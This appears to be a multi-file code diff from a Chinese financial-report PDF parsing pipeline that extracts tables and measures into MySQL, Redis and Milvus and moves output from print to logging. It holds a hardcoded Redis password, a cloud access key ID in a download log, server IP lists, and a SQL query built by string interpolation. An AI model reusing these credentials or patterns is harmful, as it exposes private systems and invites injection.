@@ -223,12 +222,26 @@ def get_table_range(file_path, file_id, pages, tables_range):
    try:
        tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'], shift_text=['l'])
        for t in tables:

            top = t._bbox[3]
            buttom = t._bbox[1]
            page_num = int(t.page)
            table_index = int(t.order)
            arr = np.array(t.data)

            if page_num != 0:
                # Write the table data to the database
                line_texts = []
                for lines in t.data:
                    lines = list(set(lines))
                    for line in lines:
                        line_texts.append(line)

                db_service.batch_insert_page_text_nocheck({
                    'file_id': file_id,
                    'page_num': page_num,
                    'text': line_texts
                }, conn, cursor)

            arr = safe_process_array(process_array, arr)  # Merged-cell problem in some balance sheets
            arr = safe_process_array(process_array_with_annual_comparison, arr)  # Complex-table optimization: handling multiple "same period last year" columns
            arr = safe_process_array(process_array_with_grants, arr)  # Non-recurring items in Q3 reports

@@ -421,8 +434,14 @@ def get_table_range(file_path, file_id, pages, tables_range):
                "data": new_data,
                'sort_num': page_num*1000 - top
            }}, conn_app, cursor_app)

    except Exception as e:
        print(f'camelot解析表格时出现了{e}')
        logger.info(f'camelot解析表格时出现了{e}')

    get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app)

    cursor.close()

@@ -432,7 +451,7 @@ def get_table_range(file_path, file_id, pages, tables_range):
    redis_client.close()

    end = time.time()
    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))

def text_in_table(top, tables_range, page_num):
    if tables_range.get(page_num):
@@ -468,7 +487,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien

    page_start = pages.split('-')[0]
    page_end = pages.split('-')[1]
    print(f'pages的值为{pages}')
    logger.info(f'pages的值为{pages}')
    select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
    cursor.execute(select_year_select)
    record_select = cursor.fetchall()

@@ -513,8 +532,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                line_text = re.sub(r"\s", "", line_text)

                # Extract qualifying text into pdf_text_info, used to detect writing errors in the text
                if not utils.pdf_text_flag(line_text):
                    line_texts.append(line_text)
                # if not utils.pdf_text_flag(line_text):
                line_texts.append(line_text)
                #db_service.insert_pdf_text_info({
                #    'file_id': file_id,
                #    'page_num': pagenum+1,

@@ -536,7 +555,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                if text_type in ('page_header','page_footer'):
                    break
                if pagenum == 44:
                    print(f'line_text在第44页的值有{line_text}')
                    logger.info(f'line_text在第44页的值有{line_text}')
                # This applies to the whole page and would drop many valid tables
                # Record the page numbers that need to be filtered out
                if len(re.findall('母公司|现金流量表补充', line_text)) > 0:

@@ -546,10 +565,11 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                        'type': 'parent_com',
                    }, conn_app, cursor_app)

                # Save the text in the small region above each table; it contains the table title and the unit of its measures
                table_info = {}

                if utils.check_table_title_black_list(line_text, title_list):

                    db_service.insert_measure_parser_info({
                        'file_id': file_id,
                        'content': f"{range['page_num']}_{range['table_index']}",

@@ -613,6 +633,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                table_info = {}
                # Record the page numbers that need to be filtered out
                if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
                    logger.info(f'line_text{line_text}')
                    logger.info(f'pagenum{pagenum}')
                    db_service.insert_measure_parser_info({
                        'file_id': file_id,
                        'content': pagenum+2,

@@ -665,8 +687,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                'text': line_texts
            }, conn, cursor)
    except Exception as e:
        print(f'{pagenum}页处理异常')
        print(e)
        logger.info(f'{pagenum}页处理异常')
        logger.info(e)


def get_table_unit_info(file_id, line_text, page_num, table_index):
@@ -725,7 +747,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
        uri=MILVUS_CLIENT,
    )

    print('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
    logger.info('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
    start = time.time()
    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]

@@ -738,10 +760,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
            arr = np.array(t['data'])
            rows, cols = arr.shape
            if rows == 1 and cols == 1:
                continue
            continue
            row_num, col_num = -1, -1

            # Walk the array with nested loops to find the first numeric cell
            for i in range(rows):
                for j in range(cols):

@@ -834,6 +854,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):

            redis_client.incr(f'parsed_measure_count_{file_id}')

            if len(measure_list) > 0:
                data_dict["measure_list"] = measure_list
                data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}"

@@ -841,12 +863,12 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                measure_obj.append(data_dict)
                db_service.insert_measure_data_to_milvus(client, partition_name, measure_obj, cursor_app, conn_app)
            except Exception as e:
                print(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
                print(f"错误是:{e}")
                logger.info(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
                logger.info(f"错误是:{e}")
        end = time.time()
        print('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
        logger.info('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
    except Exception as e:
        print(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
        logger.info(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
        record_start = record_range.split('-')[0]
        record_end = record_range.split('-')[1]
        for index in range(int(record_start), int(record_end)):

@@ -857,7 +879,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
            try:
                arr = np.array(t['data'])
            except Exception as e:
                print(f'这个错误是{e}的arr的值是{arr}')
                logger.info(f'这个错误是{e}的arr的值是{arr}')
    finally:
        redis_client.close()
        cursor.close()
@@ -877,7 +899,7 @@ def dispatch_job(job_info):
        get_table_range(path, file_id, page_num, tables_range)

    except Exception as e:
        print(e)
        logger.info(e)

# Measure normalization

@@ -901,7 +923,7 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):

    # Create a cursor to execute SQL statements
    cursor_app = conn_app.cursor(buffered=True)
    print(f'目录黑名单为:{parent_table_pages}')
    logger.info(f'目录黑名单为:{parent_table_pages}')
    db_service.delete_to_run(conn, cursor, file_id)
    db_service.insert_table_measure_from_vector_async_process(cursor, parent_table_pages, file_id, file_path, partition_name)

@@ -913,6 +935,44 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
    cursor_app.close()
    conn_app.close()


# def merge_consecutive_arrays(word_info):
#     merged_objects = []
#     temp_list = []

#     for info_obj in word_info:
#         try:
#             if info_obj['type'] == 'table':
#                 # If the object is a table, add its elements to the temporary list
#                 data = info_obj['data']
#                 if not data:
#                     continue
#                 first_row = data[0]
#                 if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
#                     temp_list.append(info_obj)
#                 elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
#                     merged_objects.append(temp_list)
#                     temp_list = []
#                     temp_list.append(info_obj)
#                 elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
#                     temp_data = temp_list[-1]['data']
#                     temp_data = list(temp_data)
#                     for row in list(info_obj['data']):
#                         temp_data.append(row)
#                     info_obj['data'] = temp_data
#                     temp_list.clear()
#                     temp_list.append(info_obj)

#         except Exception as e:
#             applog.error(f"解析数据错误: {e}")

#     if temp_list:
#         merged_objects.append(temp_list)

#     return merged_objects

def merge_consecutive_arrays(pdf_info):
    merged_objects = []
    temp_array = {}
@@ -941,7 +1001,7 @@ def merge_consecutive_arrays(pdf_info):
                    temp_array = {}  # Reset the temporary container
        except Exception as e:
            #print(info_obj)
            print(f"解析数据错误: {e}")
            logger.info(f"解析数据错误: {e}")

    if temp_array:
        merged_objects.append(temp_array)

@@ -980,7 +1040,7 @@ def merge_consecutive_arrays_v1(pdf_info):
                    merged_objects.append(temp_array)
                    temp_array = {}  # Reset the temporary container
        except Exception as e:
            print(f"解析数据错误: {e}")
            logger.info(f"解析数据错误: {e}")

        # After the loop, append the temporary container if it is non-empty
        if temp_array:

@@ -1017,7 +1077,7 @@ def start_table_measure_job(file_id,partition_name):
    redis_client.close()

    records_range_parts = utils.get_range(len(pdf_tables), MEASURE_COUNT)
    print(f'records_range_part识别页码的值为{records_range_parts}')
    logger.info(f'records_range_part识别页码的值为{records_range_parts}')
    processes = []
File diff suppressed because one or more lines are too long
@@ -157,7 +157,7 @@ def create_text_outline(pdf_path, file_id):
            if len(re.findall('财务报表主要项目注释', title)) == 0:
                page_end = page_end - 1
            # print(title, page_start, page_end)
            for i in range(page_start, page_end + 1):
            for i in range(page_start, page_end):
                # Append each page number to the list
                parent_table_pages_local[file_id].append(i)
    file_info['page_count'] = page_count

@@ -168,6 +168,68 @@ def create_text_outline(pdf_path, file_id):

    return file_info


def create_text_outline_disclosure(pdf_path, file_id):
    # print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
    # creating an object
    with open(pdf_path, 'rb') as file:
        file_info = {}
        fileReader = PyPDF2.PdfReader(file)
        page_count = len(fileReader.pages)

        redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
        redis_client.set(f'page_count_{file_id}', page_count)

        info = {
            'page_count': page_count,
            'all_pages': {},
            'current_page_id': 1,
            'padding': 0
        }

        print('Number of pages: %d' % info['page_count'])

        pages = fileReader.trailer['/Root']['/Pages'].get_object()
        recursive_numbering(pages, info)
        #for page_num, page in enumerate(pages['/Kids']):
        #    page_obj = page.getObject()
        #    all_pages[id(page_obj)] = page_num + 1  # who starts counting from 0 anyways?
        title_array = get_tree_pages(fileReader.outline, info, 0, [])
        #db_service.pdf_title_insert_mysql(file_id, title_array)
        #title_array = db_service.get_file_info_from_mysql(file_id)

        parent_table_pages_local = {}
        parent_table_pages_local[file_id] = []
        print(f'{file_id}:{len(title_array)}')
        for i in range(len(title_array)):
            title_obj = title_array[i]
            title = title_obj['title']
            #print(f'标题分别是{title}')
            if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项|主要控股参股公司|结构化主体情况|公司股份总数及股东结构变动及公司资产和负债结构的变动情况|所有权或使用权受到限制的资产|在建工程|固定资产|其他主体中的权益|分部信息|与金融工具相关的风险|其他关联交易|公司子公司重大事项', title)) > 0:
                page_start = title_obj['page_num']
                depth = title_obj['depth']
                if i < len(title_array) - 1:
                    page_end = title_array[i+1]['page_num']
                    if title_array[i]['depth'] in [1, 2]:
                        page_end = get_page_end(i+1, depth, title_array)
                else:
                    page_end = page_count
                print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')

                # When the title is "母公司财务报表主要项目注释", do not filter its last page, so the core ROE measures can still be recalled
                if len(re.findall('财务报表主要项目注释', title)) == 0:
                    page_end = page_end - 1
                # print(title, page_start, page_end)
                for i in range(page_start, page_end + 1):
                    # Append each page number to the list
                    parent_table_pages_local[file_id].append(i)
        file_info['page_count'] = page_count
        file_info['parent_table_pages'] = parent_table_pages_local[file_id]
        file_info['split_parts'] = get_file_split(page_count)

        redis_client.close()

        return file_info

if __name__ == '__main__':
    import time
    path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"
@@ -2,18 +2,18 @@

# Set the file paths and the target directory. Note: the config file here must NOT be transferred. /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py
#FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py"
FILES="/root/pdf_parser/zzb_data_prod/main.py"
FILES="/root/pdf_parser/zzb_data_prod/put_code.sh"
DEST_PATH="/root/pdf_parser/zzb_data_prod"

# Server list. Primary servers: "1.94.143.23" "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13"
#SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131")
#SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185")
# Regulator servers
SERVERS=("192.168.0.108" "192.168.0.131")
#SERVERS=("192.168.0.108" "192.168.0.131")
# Enterprise servers
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239")
# Both together
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
# Loop over each server and upload the files
for SERVER in "${SERVERS[@]}"; do
    echo "Uploading files to $SERVER"
@@ -10,4 +10,6 @@ pydantic
uvicorn
redis
ghostscript
opencv-python-headless
opencv-python-headless
python-docx
docx2pdf
File diff suppressed because it is too large
File diff suppressed because it is too large

@@ -1,175 +1,175 @@
import PyPDF2
import re
import os, threading
from config import REDIS_HOST, REDIS_PORT, REDIS_PASSWORD
import redis

def get_tree_pages(root, info, depth=0, title_array=[]):
    """
    Recursively iterate the outline tree
    Find the pages pointed by the outline item
    and get the assigned physical order id

    Decrement with padding if necessary
    """

    if isinstance(root, dict):
        # print(root)
        page = root['/Page'].get_object()
        # print(id(page))
        t = root['/Title']
        title = t
        if isinstance(t, PyPDF2.generic.ByteStringObject):
            title = t.original_bytes.decode('utf8')
        title = title.strip()
        title = title.replace('\n', '')
        title = title.replace('\r', '')

        page_num = info['all_pages'].get(id(page), 0)
        if page_num == 0:
            print('Not found page number for /Page!', page)
        elif page_num < info['padding']:
            page_num = 0
        else:
            page_num -= info['padding']

        # str_val = '%-5d' % page_num
        # str_val += '\t' * depth
        # str_val += title + '\t' + '%3d' % page_num
        # print(str_val)
        title_array.append({
            'title': title,
            'page_num': page_num,
            'depth': depth
        })
    for elem in root:
        get_tree_pages(elem, info, depth+1, title_array)
    return title_array


def recursive_numbering(obj, info):
    """
    Recursively iterate through all the pages in order and assign them a physical
    order number
    """
    # print(id(obj), obj)
    if obj['/Type'] == '/Page':
        obj_id = id(obj)
        if obj_id not in info['all_pages']:
            info['all_pages'][obj_id] = info['current_page_id']
            info['current_page_id'] += 1
        return
    elif obj['/Type'] == '/Pages':
        for page in obj['/Kids']:
            recursive_numbering(page.get_object(), info)

def get_numbers_between(numbers_between, start, end):
    # Collect every number between the two endpoints into the list
    for i in range(start, end + 1):
        numbers_between.append(i)
    return numbers_between

def get_page_end(start, depth, title_array):
    page_end = -1
    for i in range(start, len(title_array)):
        if title_array[i]['depth'] == depth:
            page_end = title_array[i]['page_num']
            break
    return page_end

def get_file_split(page_count):
    # Get the number of CPU cores
    cpu_count = os.cpu_count()
    if page_count < cpu_count:
        cpu_count = page_count
    # Use divmod() to get the quotient and the remainder
    quotient, remainder = divmod(page_count, cpu_count)
    table_split_parts = []
    text_split_parts = []
    for i in range(cpu_count):
        start_num = i * quotient
        if i < cpu_count-1:
            start_num = i * quotient
            end_num = start_num + quotient
        else:
            end_num = page_count
        table_split_parts.append(f'{start_num}-{end_num}')
        text_split_parts.append(get_numbers_between([], start_num, end_num))

    # Return the split parts
    return {
        'table_split_parts': table_split_parts,
        'text_split_parts': text_split_parts
    }
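A worked example of the split, assuming a 4-core machine (os.cpu_count() == 4) and a 10-page file; the values follow directly from the code above:

    quotient, remainder = divmod(10, 4)   # -> 2, 2
    # table_split_parts == ['0-2', '2-4', '4-6', '6-10']   (the last slice absorbs the remainder)
    # text_split_parts  == [[0, 1, 2], [2, 3, 4], [4, 5, 6], [6, 7, 8, 9, 10]]
    # Note: get_numbers_between() is end-inclusive, so boundary pages land in two consecutive parts.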

def create_text_outline(pdf_path, file_id):
    # print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
    # creating an object
    with open(pdf_path, 'rb') as file:
        file_info = {}
        fileReader = PyPDF2.PdfReader(file)
        page_count = len(fileReader.pages)

        redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
        redis_client.set(f'page_count_{file_id}', page_count)

        info = {
            'page_count': page_count,
            'all_pages': {},
            'current_page_id': 1,
            'padding': 0
        }

        print('Number of pages: %d' % info['page_count'])

        pages = fileReader.trailer['/Root']['/Pages'].get_object()
        recursive_numbering(pages, info)
        #for page_num, page in enumerate(pages['/Kids']):
        #    page_obj = page.getObject()
        #    all_pages[id(page_obj)] = page_num + 1  # who starts counting from 0 anyways?
        title_array = get_tree_pages(fileReader.outline, info, 0, [])

        parent_table_pages_local = {}
        parent_table_pages_local[file_id] = []
        print(f'{file_id}:{len(title_array)}')
        for i in range(len(title_array)):
            title_obj = title_array[i]
            title = title_obj['title']
            #print(f'标题分别是{title}')
            if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项', title)) > 0:
                page_start = title_obj['page_num']
                depth = title_obj['depth']
                if i < len(title_array) - 1:
                    page_end = title_array[i+1]['page_num']
                    if title_array[i]['depth'] in [1, 2]:
                        page_end = get_page_end(i+1, depth, title_array)
                else:
                    page_end = page_count
                print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')

                # When the title is "母公司财务报表主要项目注释", do not filter its last page, so the core ROE measures can still be recalled
                if len(re.findall('财务报表主要项目注释', title)) == 0:
                    page_end = page_end - 1
                # print(title, page_start, page_end)
                for i in range(page_start, page_end + 1):
                    # Append each page number to the list
                    parent_table_pages_local[file_id].append(i)
        file_info['page_count'] = page_count
        file_info['parent_table_pages'] = parent_table_pages_local[file_id]
        file_info['split_parts'] = get_file_split(page_count)

        redis_client.close()

        return file_info

if __name__ == '__main__':
    import time
    path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"

    threading.Thread(target=create_text_outline, args=(path, '111')).start()
    time.sleep(5)
    threading.Thread(target=create_text_outline, args=(path, '222')).start()
File diff suppressed because it is too large

@@ -0,0 +1,3 @@
--2024-12-27 11:23:36--  https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
@@ -1,154 +1,14 @@
#coding=utf-8
import sys, ast
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfpage import PDFPage
import utils
import mysql.connector
from pymilvus import connections, MilvusClient
import json
import db_service
import ast
# -*- coding: utf-8 -*-
import re
import numpy as np
import config
import redis_service
from config import MILVUS_CLIENT, MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
import main
import redis

def measure_config_to_db(conn, cursor):
    insert_query = '''
        INSERT INTO measure_config
        (measure_id, measure_name, ori_measure_id, ori_measure_name)
        VALUES (%s, %s, %s, %s)
    '''
    check_query = '''
        select ori_measure_id from measure_config
    '''
    # Open the text file
    with open('/Users/zhengfei/work/zzb_data/measure_config_all.txt', 'r') as file:
        # Read all lines into a list
        lines = file.readlines()

    # Process each line
    for line in lines:
        config_list = line.strip().split(',')
        measure = config_list[0]
        ori_measure = config_list[1]
        ori_measure_id = utils.get_md5(ori_measure)
        # Check whether the record already exists in the database
        # cursor.execute(check_query.format(ori_measure_id=ori_measure_id))
        # check_records = cursor.fetchall()
        # if (len(check_records)) > 0:
        #     continue
        data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure)
        cursor.execute(insert_query, data_to_insert)
    conn.commit()

def insert_measure_vector(conn, cursor):

    redis_client = redis.Redis(host='192.168.0.172', port=6379, password='Xgf_redis', db=6)
    # Run the query and refresh the vectors
    select_query = '''
        SELECT ori_measure_id, ori_measure_name FROM measure_config
    '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标', record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])

        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()

def contains_financial_indicators(text):
    import re
    # Regex patterns for thousands-separated numbers and percentages
    pattern = r"\d{1,3}(,\d{3})+(\.\d{1,3})?"

    pattern1 = r"\d+(.\d+)+%?"
    # Use re.search to look for a match
    match = re.search(pattern1, text)

    # Return True if a match was found, otherwise False
    return bool(match)
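Worth noting while this helper is on its way out of the file: pattern1 leaves the dot unescaped, so it matches any character, not only a decimal point. A quick illustrative check (hypothetical REPL session):

    import re
    pattern1 = r"\d+(.\d+)+%?"                   # '.' is unescaped, so it matches any character
    print(bool(re.search(pattern1, "3.14%")))    # True - the intended case
    print(bool(re.search(pattern1, "1a2b3")))    # also True, despite having no decimal point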

def get_clean_text(text):
    import re
    pattern = r"\([^)]*?\)"
    matches = re.findall(pattern, text)
    for match in matches:
        # Use re.search to check whether the bracketed content mentions a month or one of the keywords
        month_keywords_found = re.search(r"归属于|扣非", match)
        if not month_keywords_found:
            # If not, strip that part from the text
            text = re.sub(pattern, "", text)
        else:
            # Otherwise remove all punctuation and Chinese numerals
            text = re.sub(r"[^\w\s]", "", text)
    print(text)

def insert_and_update(conn, cursor, client, parent_table_pages, file_id, path):
    # Query measures via vectors
    db_service.insert_table_measure_from_vector(conn, cursor, client, parent_table_pages, file_id, path)

    # Measure normalization
    db_service.update_ori_measure(conn, cursor, file_id)

def print_measure_data(cursor, client):
    select_query = '''
        SELECT ori_measure_name,measure_name,ori_measure_id FROM measure_config
        where measure_id not in(select distinct measure_id from ori_measure_list where file_id='64')
    '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    for record in records:
        ori_measure_name = record[0]
        measure_name = record[1]
        ori_measure_id = record[2]
        measure_vector = redis_service.read_from_redis(ori_measure_id)

        measure_list = ast.literal_eval(measure_vector)
        data = [measure_list]
        res = client.search(
            collection_name="pdf_measure_v4",  # Replace with the actual name of your collection
            # Replace with your query vector
            data=data,
            limit=2,  # Max. number of search results to return
            search_params={"metric_type": "COSINE", "params": {}},  # Search parameters
            output_fields=["measure_name", "measure_value", "table_num", "table_index"],
            filter='file_id == "64"'
        )
        vector_str = measure_name + ":" + ori_measure_name
        # Convert the output to a formatted JSON string
        for i in range(len(res[0])):

            vector_distance = float(res[0][i]["distance"])
            vector_measure_name = res[0][i]["entity"]["measure_name"]
            measure_value = res[0][i]["entity"]["measure_value"]
            table_num = res[0][i]["entity"]["table_num"]
            table_index = res[0][i]["entity"]["table_index"]
            table_num_list = [106]
            print(vector_str + ":" + vector_measure_name + ":" + str(vector_distance) + ":" + measure_value + ":" + str(table_num) + ":" + str(table_index))
            # if vector_distance > 0.89 and table_num not in table_num_list:
            #     print(vector_str + ":" + vector_measure_name + ":" + str(vector_distance) + ":" + measure_value + ":" + str(table_num) + ":" + str(table_index) + ":" + str(0.94))
            # if vector_distance > distance and table_num not in table_num_list:
            #     print(vector_str + ":" + vector_measure_name + ":" + measure_value + ":" + str(table_num) + ":" + str(table_index) + ":" + str(vector_distance) + ":" + str(distance))


list1 = [['2.将重分类进损益的其他综合收益', '', '-135441.46', '58032.20'], ['(1)权益法下可转损益的其他综合收益', '', '', ''], ['(2)其他债权投资公允价值变动', '', '', ''], ['(3)金融资产重分类计入其他综合收益的金额', '', '', ''], ['(4)其他债权投资信用减值准备', '', '', ''], ['(5)现金流量套期储备', '', '', ''], ['(6)外币财务报表折算差额', '', '-135441.46', '58032.20'], ['(7)其他', '', '', ''], ['(二)归属于少数股东的其他综合收益的税后净额', '', '', ''], ['七、综合收益总额', '', '-154059285.14', '15109700.10'], ['(一)归属于母公司所有者的综合收益总额', '', '-153881248.66', '15109700.10'], ['(二)归属于少数股东的综合收益总额', '', '-178036.48', ''], ['八、每股收益:', '八、每股收益:', '八、每股收益:', '八、每股收益:'], ['(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715'], ['(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714']]
# Test code
if __name__ == "__main__":
    conn = mysql.connector.connect(
        host=MYSQL_HOST,
        user=MYSQL_USER,
        password=MYSQL_PASSWORD,
        database=MYSQL_DB
    )
    cursor = conn.cursor()

    insert_measure_vector(conn, cursor)
    for lines in list1:
        line = list(set(lines))
        print(line)
@@ -7,6 +7,8 @@ from pdfminer.layout import LTTextContainer, LTChar, LTRect, LTFigure
import pdfplumber

import os
import logging
log = logging.getLogger(__name__)

# Text-extraction helper

@@ -125,8 +127,8 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
                upper_side = element.y1
                # Extract the table data
                table = extract_table(pdf_path, pagenum, table_num)
                # print('第'+str(pagenum)+'页第'+str(table_num)+'个表格')
                # print(table)
                # log.info('第%s页第%s个表格', str(pagenum), str(table_num))
                # log.info(table)
                # Convert the table data to a structured string
                table_string = table_converter(table)
                # Append the table string to the list

@@ -148,15 +150,15 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
            first_element = True
            table_num += 1

    print('第'+str(pagenum)+'部分')
    print('page_text:')
    print(page_text)
    #print('line_format:')
    #print(line_format)
    #print('text_from_tables:')
    #print(text_from_tables)
    #print('page_content:')
    #print(page_content)
    log.info('第%s部分', str(pagenum))
    log.info('page_text:')
    log.info(page_text)
    #log.info('line_format:')
    #log.info(line_format)
    #log.info('text_from_tables:')
    #log.info(text_from_tables)
    #log.info('page_content:')
    #log.info(page_content)

    # Create the dictionary key
    dctkey = 'Page_' + str(pagenum)

@@ -171,7 +173,7 @@ pdfFileObj.close()

# Show the page content
# result = ''.join(text_per_page['Page_0'][4])
# print(result)
# log.info(result)

# result1 = ''.join(text_per_page['Page_1'][4])
# print(result1)
# log.info(result1)
@@ -4,6 +4,9 @@ import PyPDF2
from pdfminer.high_level import extract_pages
from pdfminer.layout import LTTextContainer, LTRect
import pdfplumber
import logging

log = logging.getLogger(__name__)

import os

@@ -82,7 +85,7 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):

    text_obj['page_num'] = pagenum
    text_obj['text'] = page_text
    print("pagenum:", pagenum, " text:", page_text)
    log.info("pagenum: %s text: %s", pagenum, page_text)

    # Print the extracted text
    # print(page_obj)
    # log.info(page_obj)
@@ -1,5 +1,7 @@
import os
import re
import logging
log = logging.getLogger(__name__)
from tqdm import tqdm
from pdfminer.pdfparser import PDFParser, PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter

@@ -24,7 +26,7 @@ def pdf_parse(pdf_path, txt_path):

    # Check whether the document allows text extraction; skip it if not
    if not doc.is_extractable:
        print(pdf_path)
        log.info(pdf_path)
        raise PDFTextExtractionNotAllowed
    else:
        # Create the PDF resource manager to share resources

@@ -48,7 +50,7 @@ def pdf_parse(pdf_path, txt_path):
            if (isinstance(x, LTTextBoxHorizontal)):
                with open(txt_path, 'a') as f:
                    results = x.get_text()
                    # print(results)
                    # log.info(results)
                    f.write(results + "\n")

@@ -68,5 +70,5 @@ if __name__ == '__main__':
            txt_path = save_txt_path + txt_name
            pdf_parse(pdf_path, txt_path)
        except:
            print("转换失败:", pdf_name)
            log.info("转换失败:%s", pdf_name)
            continue
@@ -4,6 +4,8 @@ import os
import json
import numpy as np
from datetime import datetime
import logging
logger = logging.getLogger(__name__)
# Read the PDF
import PyPDF2
# Analyze the PDF layout and extract the text

@@ -230,7 +232,7 @@ def get_measure_from_llm(user_prompt):
        llm_measure_list = result.split('\n')
        return llm_measure_list
    else:
        print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
        logger.error('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
            response.request_id, response.status_code,
            response.code, response.message
        ))

@@ -270,7 +272,7 @@ def parse_llm_measure_to_db(measure_info,type,conn,cursor):
        ori_measure_id = get_md5(ori_measure_name)
        data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time)
        cursor.execute(insert_query, data_to_insert)
        print(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
        logger.info(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")

    # Commit the transaction
    conn.commit()

@@ -300,7 +302,7 @@ def update_ori_measure(conn,cursor):

if __name__ == "__main__":
